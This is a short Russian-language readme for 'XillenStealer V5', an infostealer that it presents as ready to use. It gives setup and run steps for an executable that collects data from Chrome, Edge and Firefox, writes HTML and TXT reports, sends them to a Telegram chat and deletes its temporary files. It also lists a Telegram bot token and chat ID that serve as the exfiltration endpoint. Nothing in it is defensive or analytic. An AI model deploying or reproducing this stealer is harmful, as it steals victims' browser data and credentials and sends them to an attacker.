═══════════════════════════════════════════════════════════
   ✅ XILLENSTEALER V5 C++ - ГОТОВО К ИСПОЛЬЗОВАНИЮ
═══════════════════════════════════════════════════════════

📋 ШАГ 1: УСТАНОВИТЬ PYTHON БИБЛИОТЕКУ
   pip install pytelegrambotapi

📋 ШАГ 2: ЗАПУСТИТЬ
   .\xillen_v5.exe

✅ ЧТО БУДЕТ:
1. Соберёт данные из браузеров (Chrome, Edge, Firefox)
2. Создаст 2 файла отчётов (HTML и TXT)
3. Отправит файлы в Telegram как документы
4. Удалит временные файлы

📊 В ТЕЛЕГРАМ ПРИДУТ:
- report.html (красивый отчёт)
- report.txt (текстовый отчёт)

💬 TELEGRAM:
Bot Token: 8474305805:AAHZ98s7nr9IAFQehnqh0x3iGV1OmVhTq9I
Chat ID: 7368280792

🔧 ФАЙЛЫ:
- xillen_v5.exe - основной файл
- telegram_sender.py - отправка в Telegram

⚠️ УБЕДИТЕСЬ:
- Python 3.x установлен
- pytelegrambotapi установлен (pip install)
- Python в PATH

═══════════════════════════════════════════════════════════
